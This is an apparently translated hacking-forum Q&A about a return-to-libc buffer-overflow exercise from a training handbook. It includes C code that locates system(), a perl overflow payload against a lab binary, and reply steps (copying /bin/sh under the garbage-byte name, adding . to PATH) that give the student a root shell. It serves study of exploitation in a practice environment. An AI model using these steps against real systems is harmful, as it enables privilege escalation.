System Hacking

   ygw0225
   Question about the last practice problem in the BOF Handbook..

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=1725


There was actually a post asking the same question as mine, so I read it, but I couldn't understand what the answer meant,
so I'm asking the same question.

My output differs from the handbook's walkthrough and I'm currently stuck.
--------------------------------------------------

[student@localhost chapter_21]$ /bin/bash2

--------------------------------------------------

--------------------------------------------------

[student@localhost chapter_21]$ export PATH=$PATH:.

--------------------------------------------------

-------------------------------------------------------------

[student@localhost chapter_21]$ cat > addr_of_system.c
#include <stdio.h>
#include <dlfcn.h>

int main()
{
   long addr;
   void *handle;

   /* load libc and look up where system() is mapped */
   handle = dlopen("/lib/libc.so.6", RTLD_LAZY);
   addr = (long)dlsym(handle, "system");
   printf("system() is at 0x%lx\n", addr);

   return 0;
}
(press Ctrl+D)
[student@localhost chapter_21]$
[student@localhost chapter_21]$ gcc -o ./addr_of_system addr_of_system.c -lc -ldl
[student@localhost chapter_21]$ ./addr_of_system
system() is at 0x40058ae0
[student@localhost chapter_21]$

--------------------------------------------------------------

-> After finding the address of system
----------------------------------------------------------------------------------------------------------

[student@localhost chapter_21]$ ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@
sh: ?¿C?? command not found
Segmentation fault
[student@localhost chapter_21]$

----------------------------------------------------------------------------------------------------------

When I type the command above, the lecture shows the output above, whereas I get the message below.

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(strange characters)
sh: syntax error near unexpected token '(strange characters)'
sh: -c: line 1: '(strange characters)'
Segmentation fault

What do I need to do to get the same result as the lecture?

  Hit : 3393     Date : 2014/01/08 01:34



    
cd80 Run ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf, then
find the hex bytes of the strange characters you mentioned in the output of xxd ./asdfasdf, then
copy /bin/sh to a file named with those strange characters, along the lines of cp /bin/sh $(perl -e 'print "\x~~\x~~\x~~"'), then
do export .:$PATH and once more try
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
2014/01/08  
ygw0225 Wow, thank you! After doing as you said, I got a root shell.
But I haven't fully understood it, so let me ask a few questions.

1. I followed the solution you gave in the comment above exactly. After doing as you said, does entering the fifth line (of the comment above),
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`, give a root shell right away,
or is it a step for turning the syntax error into sh: ?¿C?? command not found, as in the lecture?
After following what you said, I got sh: ?¿C?? command not found, so I checked the hex string passed to system(),
made a link file, linked it, and confirmed it... So in the end, do I have to repeat the same thing?

2. When I run ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf the file is created, but
xxd asdfasdf shows nothing. With 2>asdfasdf .. that is, only when I put a 2 in front does xxd show it properly. What is the difference?

3. In ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`, what does the . (dot) between x84 and "\xe... mean?
2014/01/08  
cd80 1.
The first ./vuln ~~~~ is the command that puts the error message containing sh: ?¿C?? command not found into asdfasdf, and
the broken characters between sh: and command are the string that actually went in as the argument to system() and that it tried, and failed, to execute as a program name.
So we create a program with this string as its name so that it can actually be executed.

When attacking with the method you are using, you have to repeat the same process.
The technique you are using now is called RTL.
https://research.hackerschool.org:8080/Datas/Research_Lecture/[6%C2%F7]_Return_to_Lib_%B1%E2%B9%FD_%C0%CC%C7%D8%C7%CF%B1%E2.txt
It is a good idea to study with this document, or with the documents and posts that come up when you search Google for "rtl 공격" (rtl attack).
https://research.hackerschool.org:8080/Html/WG_Documents.html
There are many system hacking documents here, so take a look~

2.
Ah, the 2> was there to redirect stderr.
In Linux, three fds are used for fixed purposes:
0 is stdin, 1 is stdout, 2 is stderr.
The program name is in the error message, so you have to redirect stderr.

3. The dot was a mistake on my part, haha. It does work with a dot, though;
it is the syntax that joins two strings.
It works with a comma and it works with a dot.
2014/01/11  
ygw0225 cd80! Thank you so much... I'm trying to learn step by step, one thing at a time, but it really isn't easy ^^; 2014/01/11
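
The difference between > and 2> from question 2 and cd80's reply, as an added example that is not part of the thread. sim_vuln is a constructed stand-in for ./vuln (its messages and the bytes 0x01 0x02 0x7f are made up for this demo); each capture is hex-dumped with od so the non-printable bytes in the error message are visible.

```shell
#!/bin/sh
# Added example, not code from the thread. sim_vuln is a constructed stand-in
# for ./vuln: banner on stdout (fd 1), shell-style error on stderr (fd 2).
# The name bytes 0x01 0x02 0x7f are made-up sample values.
sim_vuln() {
    printf 'your input is AAAA\n'
    printf 'sh: \001\002\177: command not found\n' >&2
}

# hex_of FILE: the file's bytes as one lowercase hex string.
hex_of() {
    od -An -v -tx1 "$1" | tr -d ' \n'
}

# capture MODE: run sim_vuln under one redirection style, hex-dump the file.
#   out   > file        only fd 1 lands in the file (fd 2 would go to the
#                       terminal; it is discarded here to keep output clean)
#   err   2> file       only fd 2 lands in the file
#   both  > file 2>&1   fd 1, then fd 2 duplicated onto the same file
capture() {
    tmp=$(mktemp) || return 1
    case $1 in
        out)  sim_vuln >"$tmp" 2>/dev/null ;;
        err)  sim_vuln 2>"$tmp" >/dev/null ;;
        both) sim_vuln >"$tmp" 2>&1 ;;
        *)    rm -f "$tmp"; return 2 ;;
    esac
    hex_of "$tmp"
    rm -f "$tmp"
}

# name_bytes: hex of the text between "sh: " and ": command not found\n"
# in the stderr capture, i.e. the name the shell reported.
name_bytes() {
    capture err | sed -e 's/^73683a20//' \
        -e 's/3a20636f6d6d616e64206e6f7420666f756e640a$//'
}

echo "stdout only (>)  : $(capture out)"
echo "stderr only (2>) : $(capture err)"
echo "reported name    : $(name_bytes)"
```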